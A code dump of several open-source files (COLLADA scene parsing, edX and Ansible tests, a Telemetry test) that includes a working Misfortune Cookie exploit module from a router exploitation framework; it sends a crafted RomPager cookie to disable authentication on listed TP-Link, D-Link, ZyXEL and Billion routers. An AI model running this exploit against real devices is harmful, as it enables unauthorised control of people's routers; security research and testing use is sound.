self.xmlnode.append(E.bind_vertex_input(semantic=i[0], input_semantic=i[1], input_set=i[2]))
def __str__(self):
return '<MaterialNode symbol=%s targetid=%s>' % (self.symbol, self.target.id)
def __repr__(self):
return str(self)
class CameraNode(SceneNode):
"""Represents a camera being instantiated in a scene, as defined in the collada <instance_camera> tag."""
def __init__(self, camera, xmlnode=None):
"""Create a camera instance
:param collada.camera.Camera camera:
The camera being instantiated
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.camera = camera
"""An object of type :class:`collada.camera.Camera` representing the instantiated camera"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the camera node."""
else:
self.xmlnode = E.instance_camera(url="#%s"%camera.id)
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.camera.BoundCamera` if ``tipo=='camera'``"""
if tipo == 'camera':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
yield self.camera.bind(matrix)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in camera instance %s' % url)
camera = collada.cameras.get(url[1:])
if not camera: raise DaeBrokenRefError('Camera %s not found in library'%url)
return CameraNode( camera, xmlnode=node)
def save(self):
"""Saves the camera node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.camera.id)
def __str__(self):
return '<CameraNode camera=%s>' % (self.camera.id,)
def __repr__(self):
return str(self)
class LightNode(SceneNode):
"""Represents a light being instantiated in a scene, as defined in the collada <instance_light> tag."""
def __init__(self, light, xmlnode=None):
"""Create a light instance
:param collada.light.Light light:
The light being instantiated
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.light = light
"""An object of type :class:`collada.light.Light` representing the instantiated light"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the light node."""
else:
self.xmlnode = E.instance_light(url="#%s"%light.id)
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.light.BoundLight` if ``tipo=='light'``"""
if tipo == 'light':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
yield self.light.bind(matrix)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in light instance %s' % url)
light = collada.lights.get(url[1:])
if not light: raise DaeBrokenRefError('Light %s not found in library'%url)
return LightNode( light, xmlnode=node)
def save(self):
"""Saves the light node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.light.id)
def __str__(self): return '<LightNode light=%s>' % (self.light.id,)
def __repr__(self): return str(self)
class ExtraNode(SceneNode):
"""Represents extra information in a scene, as defined in a collada <extra> tag."""
def __init__(self, xmlnode):
"""Create an extra node which stores arbitrary xml
:param xmlnode:
Should be an ElementTree instance of tag type <extra>
"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the extra node."""
else:
self.xmlnode = E.extra()
def objects(self, tipo, matrix=None):
if tipo == 'extra':
for e in self.xmlnode.findall(tag(tipo)):
yield e
@staticmethod
def load( collada, node ):
return ExtraNode(node)
def save(self):
pass
def loadNode( collada, node, localscope ):
"""Generic scene node loading from a xml `node` and a `collada` object.
Knowing the supported nodes, create the appropiate class for the given node
and return it.
"""
if node.tag == tag('node'): return Node.load(collada, node, localscope)
elif node.tag == tag('translate'): return TranslateTransform.load(collada, node)
elif node.tag == tag('rotate'): return RotateTransform.load(collada, node)
elif node.tag == tag('scale'): return ScaleTransform.load(collada, node)
elif node.tag == tag('matrix'): return MatrixTransform.load(collada, node)
elif node.tag == tag('lookat'): return LookAtTransform.load(collada, node)
elif node.tag == tag('instance_geometry'): return GeometryNode.load(collada, node)
elif node.tag == tag('instance_camera'): return CameraNode.load(collada, node)
elif node.tag == tag('instance_light'): return LightNode.load(collada, node)
elif node.tag == tag('instance_controller'): return ControllerNode.load(collada, node)
elif node.tag == tag('instance_node'): return NodeNode.load(collada, node, localscope)
elif node.tag == tag('extra'):
return ExtraNode.load(collada, node)
elif node.tag == tag('asset'):
return None
else: raise DaeUnsupportedError('Unknown scene node %s' % str(node.tag))
class Scene(DaeObject):
"""The root object for a scene, as defined in a collada <scene> tag"""
def __init__(self, id, nodes, xmlnode=None, collada=None):
"""Create a scene
:param str id:
A unique string identifier for the scene
:param list nodes:
A list of type :class:`collada.scene.Node` representing the nodes in the scene
:param xmlnode:
When loaded, the xmlnode it comes from
:param collada:
The collada instance this is part of
"""
self.id = id
"""The unique string identifier for the scene"""
self.nodes = nodes
"""A list of type :class:`collada.scene.Node` representing the nodes in the scene"""
self.collada = collada
"""The collada instance this is part of"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the scene node."""
else:
self.xmlnode = E.visual_scene(id=self.id)
for node in nodes:
self.xmlnode.append( node.xmlnode )
def objects(self, tipo):
"""Iterate through all objects in the scene that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:rtype: generator that yields the type specified
"""
matrix = None
for node in self.nodes:
for obj in node.objects(tipo, matrix): yield obj
@staticmethod
def load( collada, node ):
id = node.get('id')
nodes = []
tried_loading = []
succeeded = False
localscope = {}
for nodenode in node.findall(tag('node')):
try:
N = loadNode(collada, nodenode, localscope)
except DaeInstanceNotLoadedError as ex:
tried_loading.append((nodenode, ex))
except DaeError as ex:
collada.handleError(ex)
else:
if N is not None:
nodes.append( N )
if N.id and N.id not in localscope:
localscope[N.id] = N
succeeded = True
while len(tried_loading) > 0 and succeeded:
succeeded = False
next_tried = []
for nodenode, ex in tried_loading:
try:
N = loadNode(collada, nodenode, localscope)
except DaeInstanceNotLoadedError as ex:
next_tried.append((nodenode, ex))
except DaeError as ex:
collada.handleError(ex)
else:
if N is not None:
nodes.append( N )
succeeded = True
tried_loading = next_tried
if len(tried_loading) > 0:
for nodenode, ex in tried_loading:
raise DaeBrokenRefError(ex.msg)
return Scene(id, nodes, xmlnode=node, collada=collada)
def save(self):
"""Saves the scene back to :attr:`xmlnode`"""
self.xmlnode.set('id', self.id)
for node in self.nodes:
node.save()
if node.xmlnode not in self.xmlnode:
self.xmlnode.append(node.xmlnode)
xmlnodes = [n.xmlnode for n in self.nodes]
for node in self.xmlnode:
if node not in xmlnodes:
self.xmlnode.remove(node)
def __str__(self):
return '<Scene id=%s nodes=%d>' % (self.id, len(self.nodes))
def __repr__(self):
return str(self)
|
gpl-3.0
|
romain-li/edx-platform
|
lms/djangoapps/courseware/tests/test_video_xml.py
|
17
|
3114
|
# -*- coding: utf-8 -*-
# pylint: disable=protected-access
"""Test for Video Xmodule functional logic.
These test data read from xml, not from mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py.
You can search for usages of this in the cms and lms tests for examples.
You use this so that it will do things like point the modulestore
setting to mongo, flush the contentstore before and after, load the
templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined in
common/lib/xmodule/xmodule/modulestore/tests/factories.py to create the
course, section, subsection, unit, etc.
"""
from nose.plugins.attrib import attr
from xmodule.video_module import VideoDescriptor
from xmodule.tests import LogicTest
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
youtube="0.75:jNCf2gIqpeE,1.0:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
<transcript language="uk" src="ukrainian_translation.srt" />
</video>
"""
@attr(shard=1)
class VideoModuleLogicTest(LogicTest):
"""Tests for logic of Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
|
agpl-3.0
|
j91321/rext
|
modules/exploits/allegrosoft/misfortune_auth_bypass.py
|
1
|
22767
|
# Name:Misfortune Cookie vulnerability authentication bypass
# File:misfortune_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 22.9.2016
# Description: PoC based on 31C3 presentation,
# exploit based on Marcin Bury and Milad Doorbash routersploit module.
import core.Exploit
import interface.utils
from core.io import query_yes_no
from interface.messages import print_failed, print_success, print_warning, print_error, print_info, print_help
import requests
import requests.exceptions
import re
class Exploit(core.Exploit.RextExploit):
"""
Name:Misfortune Cookie vulnerability authentication bypass
File:misfortune_auth_bypass.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 4.2.2014
Description: PoC based on 31C3 presentation, exploit based on Marcin Bury and Milad Doorbash routersploit module.
Options:
Name Description
host Target host address
port Target port
model Target model
"""
devices = None
number = None
offset = None
def __init__(self):
# This part is directly taken from routersploit module
self.devices = [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693,
'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545,
'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218,
'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366,
'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453,
'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690,
'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270,
'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378,
'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218,
'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",
'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13},
# 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20},
# 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21},
# 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17},
# 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1},
# 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5},
# 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25},
# 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21},
# 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9},
# 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20},
# 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17},
# 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5},
# 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1},
# 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17},
# 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5},
# 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17},
# 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37},
# 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21},
# 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21},
# 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25},
# 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25},
# 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1},
# 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24},
# 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21},
# 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9},
# 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13},
# 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25},
# 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21},
# 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1},
# 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25},
# 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13},
# 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21},
# 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0},
# 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25},
# 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21},
# 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25},
# 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13},
# 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21},
# 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21},
# 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13},
# 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25},
# 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37},
# 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29},
# 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0},
# 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36},
# 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071
]
core.Exploit.RextExploit.__init__(self)
def do_list(self, e):
counter = 0
print_info("ID\tManufacturer\tModel\tFirmware")
for device in self.devices:
print_info("%d %s" % (counter, self.devices[counter]['name']))
counter += 1
def do_set(self, e):
args = e.split(' ')
try:
if args[0] == "host":
if interface.utils.validate_ipv4(args[1]):
self.host = args[1]
else:
print_error("Please provide valid IPv4 address")
elif args[0] == "port":
if str.isdigit(args[1]):
self.port = args[1]
else:
print_error("Port value must be integer")
elif args[0] == 'device':
if not str.isdigit(args[1]):
print_error("Invalid device ID")
elif int(args[1]) < 0 or int(args[1]) > len(self.devices):
print_error("Invalid device ID")
else:
index = int(args[1])
print_info("Device: %s" % self.devices[index]['name'])
self.number = self.devices[index]['number']
print_info("Setting address to: %d" % self.number)
self.offset = self.devices[index]['offset']
print_info("Setting offset: %d" % self.offset)
except IndexError:
print_error("please specify value for variable")
def check(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_warning("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_success("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("Device is vulnerable to misfortune cookie")
return True
else:
print_failed("Test didn't pass.")
print_warning("Device MAY still be vulnerable")
return False
else:
print_failed("RomPager not detected, device is running: %s " % server)
return False
else:
print_failed("Not running RomPager")
return False
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def auth_bypass(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'}
target = 'http://' + self.host + ":" + self.port
try:
response = requests.get(target, headers=headers, timeout=60)
if response is not None and response.status_code <= 302:
print_success("Exploit sent, please check http://%s:%s authentication should be disabled"
% (self.host, self.port))
else:
print_error("Exploit failed")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
# First check with the same code as in misfortune cookie scanner
is_vulnerable = self.check()
if self.offset is None:
print_error("Please set device model by running set device id")
if is_vulnerable:
self.auth_bypass()
else:
if query_yes_no("Check indicates device is not vulnerable, would you like to try the exploit anyway?",
default="no"):
self.auth_bypass()
def help_list(self):
print_help("List all available devices")
Exploit()
|
gpl-3.0
|
willthames/ansible
|
test/units/modules/network/nxos/test_nxos_vlan.py
|
47
|
3851
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vlan
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVlanModule(TestNxosModule):
module = nxos_vlan
def setUp(self):
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vlan.run_commands')
self.run_commands = self.mock_run_commands.start()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vlan.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vlan.get_config')
self.get_config = self.mock_get_config.start()
def tearDown(self):
self.mock_run_commands.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item)
command = obj['command']
except ValueError:
command = item
filename = '%s.txt' % str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vlan', filename))
return output
self.run_commands.side_effect = load_from_file
self.load_config.return_value = None
def test_nxos_vlan_range(self):
set_module_args(dict(vlan_range='6-10'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 6', 'vlan 7', 'vlan 8', 'vlan 9', 'vlan 10'])
def test_nxos_vlan_range_absent(self):
set_module_args(dict(vlan_range='1-5', state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['no vlan 1'])
def test_nxos_vlan_id(self):
set_module_args(dict(vlan_id='15', state='present'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 15', 'exit'])
def test_nxos_vlan_id_absent(self):
set_module_args(dict(vlan_id='1', state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['no vlan 1'])
def test_nxos_vlan_named_vlan(self):
set_module_args(dict(vlan_id='15', name='WEB'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 15', 'name WEB', 'exit'])
def test_nxos_vlan_shut_down(self):
set_module_args(dict(vlan_id='1', admin_state='down'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 1', 'shutdown', 'exit'])
def test_nxos_vlan_no_change(self):
set_module_args(dict(vlan_id='1', name='default', vlan_state='active', admin_state='up'))
result = self.execute_module(changed=False)
self.assertEqual(result['commands'], [])
|
gpl-3.0
|
sahiljain/catapult
|
telemetry/telemetry/timeline/tab_id_importer_unittest.py
|
6
|
2948
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.timeline import model as timeline_model
from telemetry.timeline import tab_id_importer
from tracing.trace_data import trace_data as trace_data_module
class TabIdImporterUnitTest(unittest.TestCase):
def testImportOverflowedTrace(self):
builder = trace_data_module.TraceDataBuilder()
builder.AddTraceFor(trace_data_module.CHROME_TRACE_PART, {'traceEvents': [
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 7, 'cat': 'foo',
'tid': 1, 'ph': 'B'},
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 8, 'cat': 'foo',
'tid': 1, 'ph': 'E'},
{'name': 'b', 'args': {}, 'pid': 2, 'ts': 9, 'cat': 'foo',
'tid': 2, 'ph': 'B'},
{'name': 'b', 'args': {}, 'pid': 2, 'ts': 10, 'cat': 'foo',
'tid': 2, 'ph': 'E'},
{'name': 'trace_buffer_overflowed',
'args': {'overflowed_at_ts': 12},
'pid': 2, 'ts': 0, 'tid': 2, 'ph': 'M'}
]})
builder.AddTraceFor(
trace_data_module.TAB_ID_PART, ['tab-id-1', 'tab-id-2'])
with self.assertRaises(tab_id_importer.TraceBufferOverflowException) \
as context:
timeline_model.TimelineModel(builder.AsData())
self.assertTrue(
'Trace buffer of process with pid=2 overflowed at timestamp 12' in
context.exception.message)
def testTraceEventsWithTabIdsMarkers(self):
builder = trace_data_module.TraceDataBuilder()
builder.AddTraceFor(trace_data_module.CHROME_TRACE_PART, {'traceEvents': [
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 20, 'tts': 10, 'cat': 'foo',
'tid': 1, 'ph': 'B'},
# tab-id-1
{'name': 'tab-id-1', 'args': {}, 'pid': 1, 'ts': 25, 'cat': 'foo',
'tid': 1,
'ph': 'S', 'id': 72},
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 30, 'tts': 20, 'cat': 'foo',
'tid': 1, 'ph': 'E'},
{'name': 'tab-id-1', 'args': {}, 'pid': 1, 'ts': 35, 'cat': 'foo',
'tid': 1,
'ph': 'F', 'id': 72},
# tab-id-2
{'name': 'tab-id-2', 'args': {}, 'pid': 1, 'ts': 25, 'cat': 'foo',
'tid': 2,
'ph': 'S', 'id': 72},
{'name': 'tab-id-2', 'args': {}, 'pid': 1, 'ts': 26, 'cat': 'foo',
'tid': 2,
'ph': 'F', 'id': 72},
]})
builder.AddTraceFor(
trace_data_module.TAB_ID_PART, ['tab-id-1', 'tab-id-2'])
m = timeline_model.TimelineModel(builder.AsData())
processes = m.GetAllProcesses()
self.assertEqual(1, len(processes))
self.assertIs(processes[0], m.GetRendererProcessFromTabId('tab-id-1'))
self.assertIs(processes[0], m.GetRendererProcessFromTabId('tab-id-2'))
p = processes[0]
self.assertEqual(2, len(p.threads))
self.assertIs(p.threads[1], m.GetRendererThreadFromTabId('tab-id-1'))
self.assertIs(p.threads[2], m.GetRendererThreadFromTabId('tab-id-2'))
|
bsd-3-clause
|
sparkslabs/kamaelia
|
Sketches/RJL/Util/PureTransformer.py
|
3
|
2018
|
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
